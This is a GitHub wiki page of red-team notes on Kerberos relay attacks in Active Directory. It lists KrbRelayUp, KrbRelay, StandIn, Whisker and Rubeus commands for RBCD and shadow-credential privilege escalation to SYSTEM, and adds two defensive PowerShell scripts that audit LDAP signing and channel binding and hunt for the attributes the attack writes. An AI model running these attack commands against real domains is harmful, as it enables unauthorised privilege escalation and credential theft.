Kerberos relay attacks - CraigDonkin/Infrastructure GitHub Wiki

  • If LDAP signing and LDAP channel binding are enabled on the domain controllers, the attack is not possible.
  • Can be exploited for local privilege escalation to SYSTEM.

High level attack path

  • You need to control a computer object, for example by adding a new computer object to the domain.
  • You need access to a second computer on which you want to escalate privileges.
  • Coerce the local machine account into authenticating.
  • Relay the Kerberos authentication to LDAP.
  • Perform an RBCD attack: obtain a TGT for the controlled computer account, then perform S4U to obtain a service ticket.
  • Use the service ticket to authenticate to the local Service Control Manager and create a new service that elevates privileges to SYSTEM.
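The two settings named at the top of this page as the mitigation, plus the quota that lets an ordinary user create the computer object the attack path starts with, can be checked from the domain controller. The following audit script is an added example written for this page, not code from the wiki or from any of the tools it links; it assumes the RSAT ActiveDirectory module is installed, that it is run with administrative rights on a domain controller, and that the Directory Service log has LDAP Interface Events diagnostics raised enough to record Event ID 2889 (otherwise that check simply reports nothing).

```powershell
# Added example (not from the wiki): audit DC-side mitigations for Kerberos relay to LDAP.
# Assumes RSAT ActiveDirectory module; run as an administrator on a domain controller.
Import-Module ActiveDirectory

$ntds  = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$props = Get-ItemProperty -Path $ntds

# LDAPServerIntegrity: 1 = None (default), 2 = Require signing.
# An absent value behaves like the default, so $null is treated as "not required".
$signing = $props.LDAPServerIntegrity
# LdapEnforceChannelBinding: 0 = Never, 1 = When supported, 2 = Always.
$cbt = $props.LdapEnforceChannelBinding

$findings = @()
if ($signing -ne 2) {
    $findings += "LDAP signing is not required (LDAPServerIntegrity=$signing); a relayed Kerberos bind to LDAP is accepted."
}
if ($cbt -ne 2) {
    $findings += "LDAP channel binding is not enforced (LdapEnforceChannelBinding=$cbt); LDAPS binds are not tied to the TLS channel."
}

# ms-DS-MachineAccountQuota on the domain head: default 10 lets any authenticated
# user add computer objects, which is the "control a computer object" step above.
$domainDN = (Get-ADDomain).DistinguishedName
$quota = (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -gt 0) {
    $findings += "ms-DS-MachineAccountQuota=$quota; unprivileged users can create computer objects. Consider setting it to 0."
}

# Event ID 2889 (Directory Service log) records clients that bound without signing.
# Review these before flipping signing to Required so legitimate clients are fixed first.
$unsigned = Get-WinEvent -LogName 'Directory Service' -FilterXPath '*[System[EventID=2889]]' `
                -MaxEvents 20 -ErrorAction SilentlyContinue
if ($unsigned) {
    $findings += "Unsigned LDAP binds seen recently (Event 2889): $($unsigned.Count) most recent listed below."
    $unsigned | Select-Object TimeCreated, Message | Format-List
}

if ($findings.Count -eq 0) { 'DC LDAP hardening checks passed.' } else { $findings }
```

Both registry values take effect on the domain controller that holds them, so the check has to be run on (or remoted to) every DC, and the policy equivalents are the "Domain controller: LDAP server signing requirements" and "Domain controller: LDAP server channel binding token requirements" settings.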

Links

Automated attack - KrbRelayUp

https://github.com/Dec0ne/KrbRelayUp

KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computername> -ComputerPassword <password>

Manual attack - RBCD

Add a computer object

StandIn.exe --computer <name> --make

Get the SID

Get-DomainComputer -Identity <computer name> -Properties objectsid

Discover available ports for the OXID resolver

CheckPort.exe

Execute krbrelay

KrbRelay.exe -spn ldap/<DC> -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd <sid of computer added to domain> -port <port in output from checkport>

Request a TGT and perform S4U to get a ST for the host.

Rubeus.exe asktgt /user:<computer account>$ /aes256:<aes256 hash> /nowrap 
Rubeus.exe s4u /user:<computer account>$ /impersonateuser:Administrator /msdsspn:host/<target computer name> /ticket:<ticket> /ptt

Use the ST to create and start a new service

https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 https://github.com/rasta-mouse/SCMUACBypass

Manual attack - Shadow credentials

Check for msDS-KeyCredentialLink attribute

Whisker.exe list /target:<target computer>

Discover available ports for the OXID resolver

CheckPort.exe

Execute KrbRelay

KrbRelay.exe -spn ldap/<dc.domain name> -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred -port <output from CheckPort.exe>

Run Rubeus to get TGT

  • The KrbRelay output includes the Rubeus command to run.

Rubeus.exe asktgt /user:<user> /certificate:<certificate> /password:"<password>" /getcredentials /show /nowrap

Perform S4U2self to obtain a host service ticket

Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:host/<computer>$ /user:<computer account> /ticket:<ticket> /ptt

Use the ST to create and start a new service

https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82 https://github.com/rasta-mouse/SCMUACBypass
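Both manual paths above end by writing one attribute onto the victim computer object through the relayed LDAP session: msDS-AllowedToActOnBehalfOfOtherIdentity for the RBCD path and msDS-KeyCredentialLink for the shadow credentials path, with an attacker-created computer account as the trustee in the first case. The hunting script below is an added example for this page, not code from the wiki or from KrbRelay, Rubeus or Whisker; it assumes the RSAT ActiveDirectory module and an account that can read those attributes, and the 30-day window for quota-created computer accounts is an arbitrary choice.

```powershell
# Added example (not from the wiki): find computer objects carrying the attributes
# the RBCD and shadow-credential relay paths write, and computer accounts created
# by ordinary users under ms-DS-MachineAccountQuota. Assumes RSAT ActiveDirectory.
Import-Module ActiveDirectory

function Resolve-Principal([System.Security.Principal.IdentityReference] $id) {
    # Best-effort SID -> DOMAIN\name. A SID that no longer resolves is itself worth a look.
    try { $id.Translate([System.Security.Principal.NTAccount]).Value } catch { $id.Value }
}

# --- RBCD: msDS-AllowedToActOnBehalfOfOtherIdentity ---------------------------------
# The attribute is a security descriptor; each ACE trustee may use S4U2proxy against
# this host, i.e. impersonate users to its services. List every trustee.
Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties msDS-AllowedToActOnBehalfOfOtherIdentity, whenChanged |
ForEach-Object {
    $raw = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    if ($raw -is [byte[]]) {
        # Some module versions return the raw descriptor bytes; decode them.
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm($raw)
    } else {
        $sd = $raw   # Others already return an ActiveDirectorySecurity object.
    }
    $rules = $sd.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        [pscustomobject]@{
            Finding     = 'RBCD'
            Target      = $_.Name
            Trustee     = Resolve-Principal $ace.IdentityReference
            LastChanged = $_.whenChanged
        }
    }
}

# --- Shadow credentials: msDS-KeyCredentialLink --------------------------------------
# A key written here lets its holder obtain a TGT for the computer via PKINIT.
# Hybrid Azure AD joined devices legitimately carry one; compare against a baseline
# and treat new or additional entries on a plain domain-joined host as suspicious.
Get-ADComputer -LDAPFilter '(msDS-KeyCredentialLink=*)' `
    -Properties msDS-KeyCredentialLink, whenChanged |
ForEach-Object {
    [pscustomobject]@{
        Finding     = 'ShadowCredential'
        Target      = $_.Name
        Trustee     = "$(@($_.'msDS-KeyCredentialLink').Count) key credential(s) present"
        LastChanged = $_.whenChanged
    }
}

# --- Computer objects created under the quota ----------------------------------------
# mS-DS-CreatorSID is populated only when a non-privileged user created the object
# by consuming ms-DS-MachineAccountQuota, so it names the account to investigate.
$since = (Get-Date).AddDays(-30)   # arbitrary lookback window
Get-ADComputer -Filter 'whenCreated -ge $since' -Properties whenCreated, mS-DS-CreatorSID |
Where-Object { $_.'mS-DS-CreatorSID' } |
ForEach-Object {
    $creator = $_.'mS-DS-CreatorSID'
    if ($creator -is [byte[]]) {
        $creator = [System.Security.Principal.SecurityIdentifier]::new($creator, 0)
    }
    [pscustomobject]@{
        Finding     = 'QuotaCreatedComputer'
        Target      = $_.Name
        Trustee     = Resolve-Principal $creator
        LastChanged = $_.whenCreated
    }
}
```

Correlating the three result sets is the useful part: an RBCD trustee that is itself a computer account appearing in the QuotaCreatedComputer list, both changed within minutes of each other, matches the relay sequence described on this page. Enabling auditing of directory service changes (Event ID 5136) on the two attributes gives the same signal in real time rather than on a scheduled sweep.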
